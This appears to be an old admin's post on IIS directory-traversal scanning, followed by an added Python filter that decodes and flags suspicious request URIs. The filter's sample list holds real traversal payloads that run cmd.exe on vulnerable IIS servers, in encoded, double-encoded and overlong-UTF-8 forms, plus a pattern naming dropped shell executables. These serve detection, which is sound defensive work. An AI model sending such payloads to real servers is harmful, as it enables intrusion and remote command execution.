I get scanned by people looking for directory traversal exploits all the time and I have an SQL filter set up that allows me to keep track of these suspect requests.
The problem is that such a vulnerability scanner is very simple to make (see my tutorial on Scripting Internet Connections Under Window$ for more information). If you are worried about this sort of intrusion (and you use IIS) see my tutorial entitled Securing an installation of IIS 4. (No, seriously.)
I almost wrote a tutorial using the TCPUtil code documented in the 'Scripting connections' article to show how such a vulnerability scanner could be written, but decided against it - anyone who can't figure it out from that article... well, I'm not going to draw the skiddies a picture.
I am providing these traversal exploits here so that you can test them against _YOUR_OWN_ servers (note the IP address), and I do have a future tutorial planned on how to create your own simple IDS for web-based services (with the SQL filter I described above) when I get a minute. Watch this space.
So - the traversals...
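The request filter the post talks about, written out as an added example (this is not the author's code, nor part of the tutorial mentioned): it percent-decodes each URI twice to catch the %255c double-encoding, folds the overlong UTF-8 forms (%c0%af, %c1%9c) back to the slash they smuggle, and then flags anything that climbs above the web root or asks directly for one of the dropped shell names the scans probe for. The sample URIs and the SHELL_PROBE name list are constructed for the example.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample request URIs in the style of the scans described above.
SAMPLE_REQUESTS = [
    "/scripts/..%5c..%5cwinnt/system32/cmd.exe?/c+dir",
    "/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir",
    "/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    "/images/root.exe?/c+dir",
    "/index.html",
    "/products/../catalog.asp",
]
# Shell names the scanners request directly (taken from the post's list).
SHELL_PROBE = re.compile(r"/(cmd1?|root|shell|nbtstat)\.exe(\?|$)", re.IGNORECASE)

def decode_path(raw, rounds=2):
    """Percent-decode `rounds` times (catches %255c double encoding), then fold
    2-byte overlong UTF-8 such as %c0%af ('/') or %c1%9c ('\\') back to ASCII."""
    data = raw.encode("latin-1", "replace")
    for _ in range(rounds):
        data = unquote_to_bytes(data)
    out, i = bytearray(), 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data) and data[i + 1] & 0xC0 == 0x80:
            # lead bytes C0/C1 can only carry values < 0x80, so this is overlong
            out.append(((b & 0x1F) << 6) | (data[i + 1] & 0x3F))
            i += 2
        else:
            out.append(b)
            i += 1
    return out.decode("latin-1")

def escapes_webroot(path):
    """True if '..' segments (after '\\' -> '/' folding) climb above the web root."""
    depth = 0
    for seg in path.split("?", 1)[0].replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue
        depth += -1 if seg == ".." else 1
        if depth < 0:
            return True
    return False

def classify(raw_uri):
    """'traversal', 'shell-probe' or None for one raw request URI."""
    decoded = decode_path(raw_uri)
    if escapes_webroot(decoded):
        return "traversal"
    return "shell-probe" if SHELL_PROBE.search(decoded) else None
```

Run `classify` over each URI in your access log; a relative `..` that stays inside the root (the catalog.asp sample) is left alone, so the filter keys on escaping the root rather than on the mere presence of dots.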